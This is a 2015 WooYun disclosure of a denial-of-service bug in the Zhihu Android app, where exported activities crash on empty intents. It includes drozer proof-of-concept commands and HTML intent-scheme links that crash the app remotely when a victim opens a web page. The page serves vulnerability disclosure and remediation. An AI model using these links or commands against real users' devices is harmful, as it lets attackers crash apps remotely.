当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0121081

漏洞标题:知乎Android客户端拒绝服务漏洞(可远程攻击利用)

相关厂商:知乎

漏洞作者: 路人甲

提交时间:2015-06-17 17:20

修复时间:2015-09-16 13:20

公开时间:2015-09-16 13:20

漏洞类型:拒绝服务

危害等级:中

自评Rank:7

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-06-17: 细节已通知厂商并且等待厂商处理中
2015-06-18: 厂商已经确认,细节仅向厂商公开
2015-06-21: 细节向第三方安全合作伙伴开放
2015-08-12: 细节向核心白帽子及相关领域专家公开
2015-08-22: 细节向普通白帽子公开
2015-09-01: 细节向实习白帽子公开
2015-09-16: 细节向公众公开

简要描述:

RT

详细说明:

#### 客户端版本,zhihu-android-app-zhihu-release-2.3.1-231.apk
#### Activity组件com.zhihu.android.ui.activity.ZhihuWebActivity和com.zhihu.android.ui.activity.Oauth2AuthorizeCodeActivity对外导出,对于空的intent处理不当,导致客户端崩溃退出

<activity android:configChanges="keyboardHidden|orientation" android:label="@string/app_name" android:name="com.zhihu.android.ui.activity.ZhihuWebActivity" android:screenOrientation="portrait" android:theme="@style/Zhihu.Theme.AppTheme.SlidingBack.Light">
<intent-filter>
<action android:name="android.intent.action.VIEW"/>
<category android:name="android.intent.category.DEFAULT"/>
<category android:name="android.intent.category.BROWSABLE"/>
<data android:host="open_url" android:scheme="zhihu"/>
</intent-filter>
<meta-data android:name="android.support.PARENT_ACTIVITY" android:value=".ui.activity.MainActivity"/>
</activity>
<activity android:exported="true" android:name="com.zhihu.android.ui.activity.Oauth2AuthorizeCodeActivity" android:screenOrientation="portrait" android:theme="@style/Zhihu.Theme.AppTheme.Transparent"/>


1.JPG


Crash日志

2.JPG


3.JPG


#### POC

dz> run app.activity.start --component com.zhihu.android com.zhihu.android.ui.activity.ZhihuWebActivity
dz> run app.activity.start --component com.zhihu.android com.zhihu.android.ui.activity.Oauth2AuthorizeCodeActivity


远程攻击利用,IntentScheme

<h1><a href="intent:#Intent;component=com.zhihu.android/com.zhihu.android.ui.activity.ZhihuWebActivity;end">com.zhihu.android.ui.activity.ZhihuWebActivity</a><br>
<h1><a href="intent:#Intent;component=com.zhihu.android/com.zhihu.android.ui.activity.Oauth2AuthorizeCodeActivity;end">com.zhihu.android.ui.activity.Oauth2AuthorizeCodeActivity</a><br>


参考:

http://drops.wooyun.org/papers/2893


漏洞证明:

修复方案:

正确处理异常的intent

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:低

漏洞Rank:5

确认时间:2015-06-18 13:19

厂商回复:

多谢,我们会尽快修复。

最新状态:

暂无